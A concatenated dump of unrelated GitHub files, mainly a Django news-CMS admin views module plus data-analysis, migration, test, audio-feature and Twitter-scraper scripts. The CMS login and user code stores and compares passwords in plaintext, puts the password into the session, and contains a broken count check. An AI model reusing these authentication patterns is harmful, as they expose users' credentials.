\"static/newsimg/\" + filename\n # 写入文件中\n with open(savePath, 'wb') as f:\n for file in newsimg.chunks():\n f.write(file)\n f.flush()\n # 存入数据库中\n # 如果标题颜色不存在\n if titlecolor == None:\n news.objects.filter(id = newsid).update(catid=newsmenu, title=title, thumb=filename, time=datetime.now())\n else:\n news.objects.filter(catid = newsmenu, title = title, titlt_font_color = titlecolor, thumb = filename, time = datetime.now())\n # 把文章内容存到数据库中\n if newcontent != \" 100:\n print(\"文件过大\")\n return\n # 判断上传过来的文件类型是否是项目需要的:\n if headImg.name.split(\".\")[-1] not in [\"jpg\", \"jpeg\", \"png\"]:\n print(\"文件类型不正确\")\n return\n # 把文件保存到指定的路径中\n # 比方说static/headImg\n # 创建文件名 以及指定到保存文件的路径\n filename = \"headImg_\" + str(int(datetime.now().timestamp() * 1000000)) + \".\" + headImg.name.split(\".\")[-1]\n # print(\"filename------\",filename)\n savePath = \"static/headImg/\"+filename\n # print(\"savePath------\",savePath)\n # 写入文件中\n with open(savePath, 'wb') as f:\n for file in headImg.chunks():\n f.write(file)\n f.flush()\n # 判断用户名是否已经存在\n # 存在,提示该用户名已存在\n newusername=admain.objects.all()\n for item in newusername:\n # print(item.username)\n if username==item.username:\n return HttpResponse(returnResult.returnResult(1,\"该用户名已存在\"))\n newuser = admain(username=username, password=password,email=email, headimg=filename)\n newuser.save()\n return HttpResponse(returnResult.returnResult(0,\"添加成功\"))\n\n# 删除管理员信息\ndef deleteUser(request):\n deleteIndex=request.GET.get(\"deleteIndex\")\n admain.objects.filter(id=deleteIndex).delete()\n return HttpResponse(returnResult.returnResult(0, \"删除成功\"))\n\n# 编辑管理员信息\ndef reuser(request):\n form=TestUEditorForm()\n return render(request, \"../templates/cmsadmain/reuser.html\", {\"form\":form})\n\ndef editUser(request):\n editIndex = request.GET.get(\"editIndex\")\n # print(editIndex)\n list = admain.objects.values(\"username\", \"password\", \"email\", \"headimg\", \"resume\").get(id=editIndex)\n # print(list)\n return HttpResponse(returnResult.returnResult(0, \"删除成功\",list))\n\ndef resave(request):\n headImg = request.FILES.get(\"heading\")\n username = request.POST.get(\"username\")\n password = request.POST.get(\"pwd\")\n email = request.POST.get(\"email\")\n uid=request.POST.get(\"id\")\n print(uid)\n # print(\"头像名:\",headImg,\"用户名:\",username,\"密码:\",password,\"email:\",email)\n # 判断文件是否过大\n size = getsize(headImg.size)\n if float(size) > 100:\n print(\"文件过大\")\n return\n # 判断上传过来的文件类型是否是项目需要的:\n if headImg.name.split(\".\")[-1] not in [\"jpg\", \"jpeg\", \"png\"]:\n print(\"文件类型不正确\")\n return\n # 把文件保存到指定的路径中\n # 比方说static/headImg\n # 创建文件名 以及指定到保存文件的路径\n filename = \"headImg_\" + str(int(datetime.now().timestamp() * 1000000)) + \".\" + headImg.name.split(\".\")[-1]\n # print(\"filename------\",filename)\n savePath = \"static/headImg/\" + filename\n # print(\"savePath------\",savePath)\n # 写入文件中\n with open(savePath, 'wb') as f:\n for file in headImg.chunks():\n f.write(file)\n f.flush()\n # 判断用户名是否已经存在\n # 存在,提示该用户名已存在\n newusername = admain.objects.all()\n for item in newusername:\n # print(item.username)\n if username == item.username:\n return HttpResponse(returnResult.returnResult(1, \"该用户名已存在\"))\n print(\"898\")\n admain.objects.filter(id=uid).update(username=username, password=password, email=email, headimg=filename)\n return HttpResponse(returnResult.returnResult(0, \"更改成功\"))\n\n\n# 富文本编辑器中添加头像,头像大小单位换算的方法\ndef getsize(size, format = 'kb'):\n p = 0\n if format == 'kb':\n p = 1\n elif format == 'mb':\n p = 2\n elif format == 'gb':\n p = 3\n size /= math.pow(1024, p)\n return \"%0.2f\"%size\n\n\n#################推荐位管理\ndef positions(request):\n list = position.objects.all()\n dic = {}\n li = []\n for item in list:\n dic = {\"id\":item.id,\"name\":item.name}\n li.append(dic)\n print(li)\n return render(request,\"../templates/cmsadmain/position.html\",{\"list\":li})\n\n#添加推荐位\ndef addposition(request):\n name = request.POST.get(\"name\")\n obj = position(name=name)\n obj.save()\n return HttpResponse(0)\n\n#编辑推荐位\ndef updataposition(request):\n id = request.POST.get(\"id\")\n list = position.objects.values(\"id\",\"name\").filter(id = id)\n dic = {}\n for item in list:\n dic = {\"title\":\"编辑推荐位\",\"name\":item[\"name\"],\"id\":item[\"id\"]}\n str = json.dumps(dic)\n return HttpResponse(str)\n\ndef updatepositionHandler(request):\n id = request.POST.get(\"id\")\n name = request.POST.get(\"name\")\n list = position.objects.values(\"name\").filter(id = id)\n for item in list:\n if name == item[\"name\"]:\n return HttpResponse(returnResult.returnResult(1,\"暂无修改!\"))\n else:\n position.objects.filter(id = id).update(name=name)\n return HttpResponse(returnResult.returnResult(0, \"修改成功!\"))\n\n#删除推荐位\ndef delposition(request):\n id = request.POST.get(\"id\")\n position.objects.filter(id = id).delete()\n return HttpResponse(returnResult.returnResult(0, \"删除成功!\"))\n\n#################推荐位内容管理\ndef positioncontent(request):\n # 查询推荐位内容表\n list1 = position_content.objects.values(\"positionid\", \"newsid\", \"id\")\n #查询推荐位表\n list2 = position.objects.values(\"name\",\"id\")\n # 查询新闻表\n list3 = news.objects.values(\"title\", \"thumb\",\"id\")\n\n # 数据处理\n dic = {}\n list = []\n for item1 in list1:\n for item2 in list2:\n if item1[\"positionid\"] == item2[\"id\"]:\n for item3 in list3:\n if item1[\"newsid\"] == item3[\"id\"]:\n dic = {\"PositionContentId\":item1[\"id\"],\"PositionName\":item2[\"name\"],\"title\":item3[\"title\"],\"thumb\":item3[\"thumb\"]}\n list.append(dic)\n return render(request,\"../templates/cmsadmain/positioncontent.html\",{\"list\":list})\n\n#添加推荐内容\ndef addpositioncontent(request):\n positionid = request.POST.get(\"positionid\")\n newsidlist = json.loads(request.POST.get(\"newsid\"))\n for item in newsidlist:\n print(item)\n obj = position_content(positionid=positionid,newsid=item)\n obj.save()\n return HttpResponse(returnResult.returnResult(0, \"添加成功!\"))\n\n#编辑推荐位内容\ndef updatepositioncontent(request):\n list = position.objects.values(\"id\",\"name\")\n dic = {}\n positionlist = []\n for item in list:\n dic = {\"id\":item[\"id\"],\"name\":item[\"name\"]}\n positionlist.append(dic)\n print(positionlist)\n str = json.dumps(positionlist)\n return HttpResponse(str)\n\ndef update_position_content_Handler(request):\n positionid = request.POST.get(\"positionid\")\n position_content_id = request.POST.get(\"positioncontentid\")\n print(positionid,position_content_id)\n #执行修改操作\n position_content.objects.filter(id=position_content_id).update(positionid=positionid)\n return HttpResponse(0)\n\n#删除推荐位内容\ndef del_position_content(request):\n position_content_id = request.POST.get(\"id\")\n print(position_content_id)\n position_content.objects.filter(id=position_content_id).delete()\n return HttpResponse(0)\n\n\n\n\n\n\n\n\n###################后台登录\ndef login(request):\n return render(request,\"../templates/cmsadmain/login.html\")\n\ndef loginHandler(request):\n username = request.POST.get(\"username\")\n pwd = request.POST.get(\"password\")\n #查询数据库\n list = admain.objects.values(\"username\",\"password\").filter(username=username)\n if list.count != 0:\n for item in list:\n if pwd == item[\"password\"]:\n #如果用户名密码通过验证,存入缓存中\n dic = {\"user\":username,\"pwd\":pwd}\n str = json.dumps(dic)\n request.session[\"user\"] = str\n #同时更新用户登录时间\n admain.objects.filter(username=username).update(lasttime=datetime.now())\n return HttpResponse(returnResult.returnResult(0, \"登录成功!\"))\n else:\n return HttpResponse(returnResult.returnResult(1, \"密码错误!\"))\n else:\n return HttpResponse(returnResult.returnResult(2, \"用户名不存在!\"))\n\n\n return HttpResponse(0)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"hjc2019/cms3","sub_path":"cmsadmain/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36147898522","text":"import os\nimport json\nimport pandas as pd\nimport numpy as np\nfrom numpy.fft import fft, ifft\n\n#Calculation of the slope of a waveform\ndef cal_slope(data):\n mean = np.nan\n stdev = np.nan\n slope = np.nan\n intercept = np.nan\n\n\n sum_x = 0\n sum_x2 = 0\n sum_xy = 0\n sum_y = 0\n mean = 0\n stdev = 0\n isum = 10000\n\n for i in range(0, 10000, 1):\n # the mean and standard deviation\n temp = data[i] - mean\n mean += temp / (i + 1)\n stdev += temp * (data[i] - mean)\n\n # linear regression\n sum_x += i\n sum_x2 += i * i\n sum_xy += data[i] * i\n sum_y += data[i]\n\n slope = (isum * sum_xy - sum_x * sum_y) / (isum * sum_x2 - sum_x * sum_x)\n intercept = (sum_y - sum_x * slope) / isum\n\n return float(slope), float(intercept)\n\n\n\ndef cal_length(data):\n wfLen = 0\n\n for i, wave in enumerate(data[\"waveform\"][\"values\"].nda[0:1000]):\n wfLen += len(wave)\n\n wfLen = wfLen/(i+1)\n\n return wfLen\n\ndef cal_MinMax(data):\n minVal = 66000\n maxVal = 0\n\n for i, wave in enumerate(data[\"waveform\"][\"values\"].nda[0:1000]):\n minCheck = np.min(wave)\n maxCheck = np.max(wave)\n if minCheck < minVal:\n minVal = minCheck\n if maxCheck > maxVal:\n maxVal = maxCheck\n\n return minVal, maxVal\n\n\n#I have not settled on an algorithim for this,\n# but it is more checking the correct answer.\ndef cal_Duplicate(data):\n duplicateLong = 0\n\n \n uniqArr = np.unique(data[\"waveform\"][\"values\"].nda, axis=0)\n duplicateLong = len(data[\"waveform\"][\"values\"].nda) - len(uniqArr)\n\n return duplicateLong, duplicateLong, duplicateLong, duplicateLong, duplicateLong, duplicateLong, duplicateLong, duplicateLong \n \ndef cal_baseRMS(data):\n rmsArr = np.zeros(len(data[\"waveform\"][\"values\"].nda))\n for i,wave in enumerate(data[\"waveform\"][\"values\"].nda):\n rmsArr[i] = np.sqrt(np.mean(wave[0:1000]**2))\n\n rms = np.mean(rmsArr)\n\n return rms\n\n \ndef cal_fft(data):\n sr = 125000000\n fft1 = fft(data[\"waveform\"][\"values\"].nda[0][0:150000])\n N = len(fft1)\n n = np.arange(N)\n T = N/sr\n freq1 = n/T\n pow1 = np.abs(fft1)**2\n\n return fft1, freq1, fft1, freq1, fft1, freq1, fft1, freq1, fft1, freq1, fft1, freq1, fft1, freq1, fft1, freq1,\n\n\n","repo_name":"jbrowni2/graphanaGemini","sub_path":"calculations/rawDataCal.py","file_name":"rawDataCal.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32187301292","text":"\"\"\"empty message\n\nRevision ID: efd76e8acb8e\nRevises: 469c3c751421\nCreate Date: 2020-11-06 00:14:10.153407\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'efd76e8acb8e'\ndown_revision = '469c3c751421'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('post',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('comment',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('comment', sa.String(length=400), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('post_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('media',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('media_type', sa.Enum('VIDEO', 'PHOTO', name='mediatype'), nullable=False),\n sa.Column('url', sa.String(length=120), nullable=False),\n sa.Column('post_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.add_column('user', sa.Column('last', sa.String(length=80), nullable=False))\n op.add_column('user', sa.Column('name', sa.String(length=80), nullable=False))\n op.add_column('user', sa.Column('username', sa.String(length=80), nullable=False))\n op.create_unique_constraint(None, 'user', ['username'])\n op.drop_column('user', 'is_active')\n op.drop_column('user', 'password')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('password', mysql.VARCHAR(length=80), nullable=False))\n op.add_column('user', sa.Column('is_active', mysql.TINYINT(display_width=1), autoincrement=False, nullable=False))\n op.drop_constraint(None, 'user', type_='unique')\n op.drop_column('user', 'username')\n op.drop_column('user', 'name')\n op.drop_column('user', 'last')\n op.drop_table('media')\n op.drop_table('comment')\n op.drop_table('post')\n # ### end Alembic commands ###\n","repo_name":"sergioadll/instagram-database","sub_path":"migrations/versions/efd76e8acb8e_.py","file_name":"efd76e8acb8e_.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22182795760","text":"import locale\nfrom configparser import ConfigParser\n#detect system language\nif(\"pl\" in locale.getdefaultlocale()[0].lower()):\n\tfrom strings_pl import *\nelse:\n\tfrom strings_en import *\n#version number\nstring_version=\"v0010\"\n#API endpoint\nparser = ConfigParser()\nparser.read('props.ini')\ntry:\n\tstring_api=parser[\"ACCOUNT\"][\"api\"]\nexcept:\n\tstring_api=\"http://bajton.vlo.gda.pl/api/\"\nprint(\"[INFO] Using API endpoint:\",string_api)","repo_name":"PetrusTryb/bajton-helper","sub_path":"strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73285385449","text":"import unittest\nimport numpy as np\nfrom PCAfold import preprocess\nfrom PCAfold import reduction\nfrom PCAfold import analysis\n\nclass Preprocess(unittest.TestCase):\n\n def test_preprocess__get_partition__allowed_calls(self):\n\n pass\n\n# ------------------------------------------------------------------------------\n\n def test_preprocess__get_parition__not_allowed_calls(self):\n\n X = np.random.rand(100,10)\n idx = np.zeros((90,))\n\n with self.assertRaises(ValueError):\n (x_in_clusters, idx_in_clusters) = preprocess.get_partition(X, idx)\n\n X = np.random.rand(100,10)\n idx = np.zeros((110,))\n\n with self.assertRaises(ValueError):\n (x_in_clusters, idx_in_clusters) = preprocess.get_partition(X, idx)\n\n# ------------------------------------------------------------------------------\n\n def test_preprocess__get_partition__computation(self):\n\n try:\n x = np.array([[1,2,10],[1,2,10],[1,2,10]])\n idx = np.array([0,0,0])\n pre_x_in_clusters = [np.array([[1,2,10],[1,2,10],[1,2,10]])]\n pre_idx_in_clusters = [np.array([0,1,2])]\n (x_in_clusters, idx_in_clusters) = preprocess.get_partition(x, idx)\n comparison_1 = (pre_x_in_clusters[0] == x_in_clusters[0])\n self.assertTrue(comparison_1.all())\n comparison_2 = (pre_idx_in_clusters[0] == idx_in_clusters[0])\n self.assertTrue(comparison_2.all())\n except Exception:\n self.assertTrue(False)\n\n try:\n x = np.array([[1,2,10],[1,2,10],[30,40,50]])\n idx = np.array([0,0,1])\n pre_x_in_clusters = [np.array([[1,2,10],[1,2,10]]), np.array([[30,40,50]])]\n pre_idx_in_clusters = [np.array([0,1]), np.array([2])]\n (x_in_clusters, idx_in_clusters) = preprocess.get_partition(x, idx)\n comparison_1 = (pre_x_in_clusters[0] == x_in_clusters[0])\n comparison_2 = (pre_x_in_clusters[1] == x_in_clusters[1])\n self.assertTrue(comparison_1.all())\n self.assertTrue(comparison_2.all())\n comparison_3 = (pre_idx_in_clusters[0] == idx_in_clusters[0])\n comparison_4 = (pre_idx_in_clusters[1] == idx_in_clusters[1])\n self.assertTrue(comparison_3.all())\n self.assertTrue(comparison_4.all())\n except Exception:\n self.assertTrue(False)\n\n# ------------------------------------------------------------------------------\n","repo_name":"kamilazdybal/PCAfold","sub_path":"tests/preprocess/test_preprocess__get_partition.py","file_name":"test_preprocess__get_partition.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"24955187810","text":"import pandas as pd\n\n\ndef get_column_names(agencies):\n if len(agencies) == 0:\n column_names = ['Zipcode']\n\n elif len(agencies[0]) == 4: # Check length of entry to determine whether or not to include email\n column_names = [\"Name\", \"Address\", \"Number\", \"Zipcode\"]\n\n elif len(agencies[0]) == 5:\n column_names = [\"Name\", \"Address\", \"Number\", \"Email\", \"Zipcode\"]\n\n else:\n raise ValueError('Problem with creating column names.')\n\n return column_names\n\n\ndef create_dataframe(agencies):\n column_names = get_column_names(agencies)\n df = pd.DataFrame(agencies, columns=column_names)\n return df\n\n\ndef save_dataframe(df, data_path):\n df.to_csv(data_path, index=False)\n\n\ndef load_dataframe(data_path):\n try:\n df = pd.read_csv(data_path)\n except FileNotFoundError:\n print(\"No file exists. Creating blank dataframe.\")\n agencies = []\n df = create_dataframe(agencies)\n\n return df\n\n\ndef dataframe_to_list(df):\n agencies = []\n\n columns = list(df)\n\n for index, row in df.iterrows():\n entry = []\n\n for column in columns:\n entry.append(row[column])\n\n agencies.append(entry)\n\n return agencies\n\n\ndef get_number_completed(df):\n number_completed = len(df['Zipcode'].unique())\n print(\"Number completed: \" + str(number_completed))\n return number_completed\n\n\n\n","repo_name":"evan-fannin/carrier-agent-scraper","sub_path":"carrier_agent_scraper/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28898488464","text":"#!/usr/bin/env python3\n# coding: utf8\n\nimport numpy as np\nimport pandas as pd\nimport soundfile as sf\nfrom sklearn import preprocessing\nimport python_speech_features as spefeat\nimport librosa.core as libcore\n\nfrom tools import *\nfrom constants import AUDIO_DIR, AUDIO, SPEAKER_ID\nfrom segment import segment_audio, split_in_windows\n\n\ndef extract_with_mfcc(audio: np.array, samplerate: int):\n \"\"\"\n Extracts audio characteristics using LPC\n\n :param audio: (np.array) audio to be extracted\n :param samplerate: (int) corresponding to the samplerate of audio\n :return: characteristics of the signal\n \"\"\"\n\n features = spefeat.mfcc(audio, samplerate)\n\n return preprocessing.scale(features)\n\n\ndef extract_with_lpc(audio: np.array, samplerate: int):\n \"\"\"\n Extracts audio characteristics using LPC\n\n :param audio: (np.array) audio to be extracted\n :param samplerate: (int) corresponding to the samplerate of audio\n :return: characteristics of the signal\n \"\"\"\n\n windows = split_in_windows(audio, samplerate)\n\n # for each window, get the coefficients of the LPC\n features = np.array([\n libcore.lpc(window, 12) for window in windows\n ])\n\n return preprocessing.scale(features)\n\n\ndef extract_with_plp(audio: np.array, _: int):\n \"\"\"\n Extracts audio characteristics using PLP\n\n :param audio: (np.array) audio to be extracted\n :param _: (int) corresponding to the samplerate of audio\n :return: characteristics of the signal\n \"\"\"\n\n pass\n\n\n@get_function_duration\n@get_function_memory_consumption\ndef extract_features(\n data: pd.DataFrame, extract, multi: bool = True,\n audio_dir: str = AUDIO_DIR) -> (list, list):\n \"\"\"\n Generic function to perform feature extraction,\n independently of the extraction method\n\n :param data: (pd.DataFrame) contains the detail of each sample\n :param extract: (Function) extraction method to use\n :param multi: (bool) specify if several samples can be extract\n from one audio file\n :param audio_dir: (str) directory where the audio files are located\n :return: (features:list, labels:list)\n \"\"\"\n features = []\n speakers = []\n\n for index, row in data.iterrows():\n audio_name = row.loc[AUDIO]\n speaker = row.loc[SPEAKER_ID]\n audio, samplerate = sf.read(audio_dir + audio_name)\n audio_extracts = segment_audio(audio, samplerate)\n\n if not multi:\n audio_extracts = audio_extracts[0:1]\n\n for audio_extract in audio_extracts:\n # extract the features using the given extraction function\n features.append(extract(audio_extract, samplerate))\n speakers.append(speaker)\n\n return features, speakers\n\n\nif __name__ == '__main__':\n audio, sp = sf.read(\"database/dev/audio/aahtm.flac\")\n sp_audio = segment_audio(audio, sp)\n lpc = extract_with_lpc(audio, sp)\n","repo_name":"laurenttainturier/voice_recognition","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16144165441","text":"#Declaramos una lista\n\nalumnas = ['Hannah','Ariana','Malaika']\nalumnos = ['Iker','Andrés','Leonardo']\n\n#Ciclo for\n\n#Recorre los índices de la lista uno a uno.\nfor x in alumnas: \n\tprint(x)\n\tfor y in alumnos:\n\t\tprint(x,y)\n\n","repo_name":"arianafm/Python","sub_path":"Básico/Clase2/cicloFor.py","file_name":"cicloFor.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70473038567","text":"import os, glob, string\n\nruta = raw_input(\"Carpeta con ficheros a renombrar: \")\n#fecha = raw_input(\"introduzca el la fecha de la imagen (yyyy/mm/dd): \")\n\nindice = string.find(ruta, \"\\\\\", -21)\nescena = ruta[indice+1:]\n\nsat = escena[8:10].upper()\npath = escena[-6:-3]\nrow = \"0\" + escena[-2:]\nyear = escena[:4]\nmonth = escena[4:6]\nday = escena[6:8]\nsensor = escena[10:-6].lower()\n\n\n\nos.chdir(ruta)\narchivosimg=glob.glob('*.TIF')\narchivostxt=glob.glob('*.txt')\n\nfor fileimg in archivosimg:\n \n if \"_B7\" in fileimg or \"_B8\" in fileimg:\n os.rename(fileimg, sat + \"2\" + path + row + \"_\" + row + year + month + day + \"_\" + fileimg[-6:-4] + \"0\" + \".TIF\")\n elif \"_VCID_2\" in fileimg:\n os.rename(fileimg, sat + \"2\" + path + row + \"_\" + row + year + month + day + \"_\" + fileimg[-13:-11] + \"2\" + \".TIF\")\n elif \"_VCID_1\" in fileimg:\n os.rename(fileimg, sat + \"1\" + path + row + \"_\" + row + year + month + day + \"_\" + fileimg[-13:-11] + \"1\" + \".TIF\")\n else:\n os.rename(fileimg, sat + \"1\" + path + row + \"_\" + row + year + month + day + \"_\" + fileimg[-6:-4] + \"0\" + \".TIF\")\n \nfor filetxt in archivostxt:\n \n if \"_GCP\" in filetxt:\n os.rename(filetxt, sat + \"1\" + path + row + \"_\" + row + year + month + day + \"_\" + \"GCP\" + \".txt\")\n elif \"_MTL\" in filetxt:\n os.rename(filetxt, sat + \"1\" + path + row + \"_\" + row + year + month + day + \"_\" + \"MTL\" + \".txt\")","repo_name":"LAST-EBD/Protocolo","sub_path":"Landsat_Scripts/Rename_Gapfill.py","file_name":"Rename_Gapfill.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70042752169","text":"# Allow Ctrl-C to abort all tasks submitted to a multiprocessing Pool.\n# Any existing tasks will still run to completion, but any pending\n# tasks will exit immediately. See https://stackoverflow.com/a/68695455/5495732\n#\n# Usage:\n# from interrupt import handle_ctrl_c, init_pool\n#\n# @handle_ctrl_c\n# def task_function(args):\n# # ...\n#\n# # In main:\n# signal.signal(signal.SIGINT, signal.SIG_IGN)\n# pool = Pool(num_threads, initializer=init_pool)\n#\n# # Submit tasks to pool here\n# \n# results = pool.map(task_function, process_args)\n# if any(map(lambda x: isinstance(x, KeyboardInterrupt), results)):\n# print('Ctrl-C was entered.')\n# exit(1)\n# pool.close()\n# pool.join() \n\nimport signal\n\nfrom functools import wraps\n\ndef handle_ctrl_c(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n global ctrl_c_entered\n if not ctrl_c_entered:\n signal.signal(signal.SIGINT, default_sigint_handler) # the default\n try:\n return func(*args, **kwargs)\n except KeyboardInterrupt:\n ctrl_c_entered = True\n return KeyboardInterrupt()\n finally:\n signal.signal(signal.SIGINT, pool_ctrl_c_handler)\n else:\n return KeyboardInterrupt()\n return wrapper\n\ndef pool_ctrl_c_handler(*args, **kwargs):\n global ctrl_c_entered\n ctrl_c_entered = True\n\ndef init_pool():\n # set global variable for each process in the pool:\n global ctrl_c_entered\n global default_sigint_handler\n ctrl_c_entered = False\n default_sigint_handler = signal.signal(signal.SIGINT, pool_ctrl_c_handler)\n\n","repo_name":"akirmse/mountains","sub_path":"scripts/interrupt.py","file_name":"interrupt.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"15731274714","text":"# Write a Python script to concatenate following dictionaries to create a new one.\n\ndict1 = {'name': 'jay','python': 85, 'marks': 60}\ndict2 = {'php': 'avinash','java': 190, 'cpp': 40}\ndict3 = {'city': 'lunawada','nord.js': 78, '.net': 80}\n\nconcate_dic = {}\n\nfor i in (dict1,dict2,dict3):\n concate_dic.update(i)\n\nprint(concate_dic)","repo_name":"pateljay2114/jay_patel","sub_path":"python/assignment/module - 3/34.Write a Python script to concatenate following dictionaries to create a new one.py","file_name":"34.Write a Python script to concatenate following dictionaries to create a new one.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37753524617","text":"class Restaurant():\n\t\"\"\"Simple Restaurant information.\"\"\"\n\n\tdef __init__(self, restaurant_name, cuisine_type):\n\t\t\"\"\"Initializes attributes\"\"\"\n\t\tself.restaurant_name = restaurant_name\n\t\tself.cuisine_type = cuisine_type\n\n\tdef describe_restaurant(self):\n\t\t\"\"\"Describes a restaurant\"\"\"\n\t\tprint(\"Name: \" + self.restaurant_name.title() +\n\t\t\", Cuisine Type: \" + self.cuisine_type.title())\n\n\tdef open_restaurant(self):\n\t\t\"\"\"Displays open message.\"\"\"\n\t\tprint(self.restaurant_name.title() + \" is now open.\")\n\nrestaurant_1 = Restaurant('Reddmiamor', 'Venezuelan')\nrestaurant_2 = Restaurant('LeFran', 'Italian')\nrestaurant_3 = Restaurant('YoshNoFui', 'Peruvian')\n\nrestaurant_1.describe_restaurant()\nrestaurant_1.open_restaurant()\nrestaurant_2.describe_restaurant()\nrestaurant_3.describe_restaurant()\n\n\nclass User():\n\n\tdef __init__(self, first_name, last_name, age, weight, height):\n\t\t\"\"\"Initializes attributes\"\"\"\n\t\tself.first_name = first_name\n\t\tself.last_name = last_name\n\t\tself.age = age\n\t\tself.weight = weight\n\t\tself.height = height\n\n\tdef describe_user(self):\n\t\t\"\"\"Describes user.\"\"\"\n\t\tprint(\n\t\t\t\"Name: \" + self.first_name.title() +\n\t\t\t\"\\nLast Name: \" \t+ self.last_name.title() +\n\t\t\t\"\\nAge: \" + str(self.age) +\n\t\t\t\"\\nWeight: \"+ str(self.weight) + \"Kg\"\n\t\t\t\"\\nHeight: \" + str(self.height) + \"m\"\n\t\t\t)\n\n\tdef greet_user(self):\n\t\t\"\"\"Says hello to an user.\"\"\"\n\t\tprint(\"Hello \" + self.first_name.title() + \" \" +\n\t\tself.last_name.title() + \"!\")\n\nprueba = User(\"Reddmar\", \"quevedo\", 29, 95, 1.80)\n\nprueba.describe_user()\nprueba.greet_user()","repo_name":"Akaidmaru/random_python","sub_path":"Basic_Coding/classes_practice.py","file_name":"classes_practice.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24387657055","text":"from django.shortcuts import render\nfrom tweepy import OAuthHandler\nfrom tweepy import API\nfrom tweepy import Cursor\nfrom datetime import datetime, date, time, timedelta\nfrom collections import Counter\nfrom django.http import HttpResponse\nfrom . models import Tweets\n\n\n\n# Create your views here.\nconsumer_key=\"api_key\"\nconsumer_secret=\"api_secret_key\"\naccess_token=\"access_token\"\naccess_token_secret=\"access_token_secret\"\n\nauth = OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\nauth_api = API(auth,wait_on_rate_limit=True)\n\nusername=[\"Cristiano\",\"BarackObama\",\"rihanna\",\"TheRock\"]\n\n\n\ndef index(request):\n tweet_count = 0\n for i in username:\n try:\n for status in Cursor(auth_api.user_timeline, id=i).items():\n tweet_count = tweet_count + 1\n if status.created_at.year == 2021 and status.created_at.month == 5:\n tweets_save= Tweets.objects.create(username=i,tweet_number=tweet_count,created_at=status.created_at.day,time=status.created_at.hour,retweet_count=status.retweet_count)\n tweets_save.save()\n except:\n pass\n return HttpResponse('

    Loaded Tweets Data

    ')\n","repo_name":"Chukslord1/Arctype_Tweets_Heatmap","sub_path":"App/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24602684893","text":"from django.http import Http404\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom .models import Cattle, Entry\nfrom .forms import notifyform\n\n\ndef home(request):\n\tall_blog = Entry.objects.all()[0:5]\n\n\treturn render(request, \"index.html\" , {'all_blog': all_blog})\n\t\n\ndef log_in(request):\n\treturn render(request, \"login.html\",{})\n\ndef cattlepage(request):\n\tall_cattle = Cattle.objects.all()\n\n\tcontext = {\n\t\t'all_cattle' : all_cattle,\n\t\t\n\t}\n\treturn render(request,'cattlepage.html', context)\n\n\ndef cattle_section(request,cattle_Id):\n\t\n\ttry:\n\t\tcattle_data = Cattle.objects.get(pk = cattle_Id)\n\texcept Cattle.DoesNotExist:\n\t\traise Http404(\"The Cattle info doesn't exist\")\n\tcontext = {\n\t\t'cattle_data' : cattle_data,\n\t\t\t}\n\treturn render(request, \"cattle_data.html\",context)\n\ndef notifypage(request):\n\tform = notifyform(request.POST or None)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\treturn HttpResponseRedirect('/')\n\tcontext = {\n\t\t'form': form\n\t}\n\treturn render(request, 